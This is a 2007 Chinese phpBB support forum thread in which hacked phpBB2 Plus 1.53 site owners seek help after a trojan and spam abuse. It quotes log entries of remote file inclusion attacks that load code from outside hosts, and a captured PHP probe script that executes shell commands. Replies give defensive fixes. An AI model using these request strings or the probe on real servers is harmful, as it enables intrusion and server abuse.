[問題]phpBB2 plus 1.53 的安全性問題 - 急件

phpBB Plus Support
本區是討論關於 phpBB 2 plus 使用上的問題討論!
(發表文章請按照公告格式發表,違者砍文)

版主: 版主管理群

主題已鎖定
hsientsung
星球公民
星球公民
文章: 42
註冊時間: 2006-04-06 01:05

[問題]phpBB2 plus 1.53 的安全性問題 - 急件

文章 hsientsung » 2007-11-05 01:04

● phpBB2 版本:phpBB2 plus 1.53 based on phpBB 2.0.22
● CrackerTracker 版本:CrackerTracker Professional v5.0.4

我在後台的 CrackerTracker 的 Filescanner 裡面發現有個 Show Results 選項,它顯示出某些檔案的安全性,例如:

tellafriend.php : SAFE
quick_reply.php : Code in the file is possibly executable beyond from phpBB
album_cat.php : common.php / pagestart.php maybe not be or too late included
.
.
.

還有一些尚未列出,不知道我該如何去修正這些檔案,使其更加安全?或者我應該如何去做?

另外前些天發現被駭客入侵,竄改了網頁,還好資料沒有被更動!後來發現到,駭客竟然在 phpbb 的 captcha 資料夾中加入了一個木馬程式,並且散佈廣告信!今天,我利用 CrackerTracker 查看紀錄檔,發現如下紀錄:
第一個紀錄 寫:/includes/functions.php?phpbb_root_path=http://www.orderofronin.com/vb/impex/cmd.txt?
第二個紀錄 寫:/phpbb/album.php?user_id=40&mode=list/language/lang_german/admin_main_album.php?phpbb_root_path=http://www.woman.fromland.net//language ... man/r8.txt?
第三個紀錄 寫:/phpbb/album.php?user_id=40&mode=list/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.woman.fromland.net//language ... man/r8.txt?
赫然發現,竟然可以利用 language/lang_german/ 裡面的檔案進行非法動作!

各位大大,我該如何是好啊?這樣子的網站安全又該如何去防範?
善用搜尋是很棒的選擇,但是~~
爬文好辛苦啊~ (╯▔︹▔)╯~╘═╛

bibo8045
星球公民
星球公民
文章: 85
註冊時間: 2005-03-06 18:34

文章 bibo8045 » 2007-11-08 19:17

你的狀況跟我的雷同..正上來找資料應付
甚至對方還隱藏了2個目錄做預備,你可以看看images/avatars,還有一個在files裡..甚至開了第二個80 PORT來溝通!導致停用web後還無法重新啟動,因為系統回應PORT被占用..得關機重開。
對方一直用Apache的權限在傳播廣告信..
你的問題是不是類似?
files目錄裡有沒一個檔案是main.php 你跑跑看..系統資料一覽無遺

hsientsung
星球公民
星球公民
文章: 42
註冊時間: 2006-04-06 01:05

文章 hsientsung » 2007-11-10 16:59

bibo8045 寫:你的狀況跟我的雷同..正上來找資料應付
甚至對方還隱藏了2個目錄做預備,你可以看看images/avatars,還有一個在files裡..甚至開了第二個80 PORT來溝通!導致停用web後還無法重新啟動,因為系統回應PORT被占用..得關機重開。
對方一直用Apache的權限在傳播廣告信..
你的問題是不是類似?
files目錄裡有沒一個檔案是main.php 你跑跑看..系統資料一覽無遺
非常感謝你的告知,我的問題就是出現傳播廣告信!
但是沒有你所說的那些檔案及資料夾…
我找到的只有對方新增的資料夾以及一個 php 檔(木馬)。

最近我一直在追尋源頭,最方利用了許多位址當跳板…
但是我仍舊不曉得該如何去制止並且防護…
善用搜尋是很棒的選擇,但是~~
爬文好辛苦啊~ (╯▔︹▔)╯~╘═╛

hanson.hung
星球公民
星球公民
文章: 48
註冊時間: 2006-05-07 16:15

文章 hanson.hung » 2007-11-11 06:09

Dear,
您可以參考原廠德國官方這篇文章phpBB2 Plus 1.53a Language File Vulnerable,
並將Cracker Tracker升級到5.0.4, 請參考phpBB2 Plus 1.53a CTracker 5.0.4 Upgrade Package available.
希望對您有幫助. :-D

nanana
星球普通子民
星球普通子民
文章: 9
註冊時間: 2003-05-04 21:58
來自: 高雄楠梓
聯繫:

文章 nanana » 2007-11-11 15:01

請問發廣告信的症狀是會大量上傳嗎?

今天我發現我的server上傳33G...

前天更離譜538G...

如果不是我的流量監視程式(DU meter)有問題,那我大概要被停ip了 :-o

hsientsung
星球公民
星球公民
文章: 42
註冊時間: 2006-04-06 01:05

文章 hsientsung » 2007-11-12 02:15

hanson.hung 寫:Dear,
您可以參考原廠德國官方這篇文章phpBB2 Plus 1.53a Language File Vulnerable,
並將Cracker Tracker升級到5.0.4, 請參考phpBB2 Plus 1.53a CTracker 5.0.4 Upgrade Package available.
希望對您有幫助. :-D
都已經升級到最新,最近仍舊一直紀錄到有駭客在測試漏洞!
而且還透過許多網站當跳板,而且我抓到了駭客測試的某個檔案,供大家參考參考。
某某駭客 寫:<?php
echo "Mic22";
$dir = @getcwd();
$ker = @php_uname();
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
exit;
真是傷腦筋耶!難道 plus 這麼的不安全?那這樣子哪能叫做 PLUS 呢?!
善用搜尋是很棒的選擇,但是~~
爬文好辛苦啊~ (╯▔︹▔)╯~╘═╛

hsientsung
星球公民
星球公民
文章: 42
註冊時間: 2006-04-06 01:05

文章 hsientsung » 2007-11-12 02:17

nanana 寫:請問發廣告信的症狀是會大量上傳嗎?
今天我發現我的server上傳33G...
前天更離譜538G...
如果不是我的流量監視程式(DU meter)有問題,那我大概要被停ip了 :-o
我的是沒有那麼的誇張,但是也有幾十MB就是了!租用空間差點爆掉!
我是租用竹貓的,還好竹貓通知,並且暫時關閉,否則後果不堪設想!

:evil:
善用搜尋是很棒的選擇,但是~~
爬文好辛苦啊~ (╯▔︹▔)╯~╘═╛

bibo8045
星球公民
星球公民
文章: 85
註冊時間: 2005-03-06 18:34

文章 bibo8045 » 2007-11-17 15:41

小弟的信箱目前已被"黑"掉了...@@"
抗戰到目前並觀察這一個禮拜的結果似乎已經有效阻擋..(對方還有進來過)!

我的方式是將files跟cache設定php不能執行~

hsientsung
星球公民
星球公民
文章: 42
註冊時間: 2006-04-06 01:05

文章 hsientsung » 2007-11-18 02:28

bibo8045 寫:小弟的信箱目前已被"黑"掉了...@@"
抗戰到目前並觀察這一個禮拜的結果似乎已經有效阻擋..(對方還有進來過)!
我的方式是將files跟cache設定php不能執行~
設定成不能執行!那就表示其他屬性還是有設定囉!?
所以你設定的屬性為 666
善用搜尋是很棒的選擇,但是~~
爬文好辛苦啊~ (╯▔︹▔)╯~╘═╛

michaelchain
星球公民
星球公民
文章: 129
註冊時間: 2006-10-17 03:13

文章 michaelchain » 2007-11-18 10:18

以上展示的幾個hack鏈接, 都是可以達成的.
對于functions.php, 如果需要禁止跨站調用, 可以在前面加上

代碼: 選擇全部

if ( !defined('IN_PHPBB') )
{
	die("Hacking attempt");
}
放在

代碼: 選擇全部

<?php
下面

對于其他幾個php文件, 如果要預防跨站調用, 都可以這樣做
我并未用過plus, 但是從提供的鏈接看, album.php有很明顯的漏洞可以利用.
※伺服器主機:Intel Core2 酷睿™2 E6300, 升級到4GB RAM了
※主機作業系統:CentOS 4 Linux
※我的 phpBB 版本:phpBB3.0.?
※我的網址: 中文PHPBB

主題已鎖定

回到「phpBB 2 plus 綜合討論」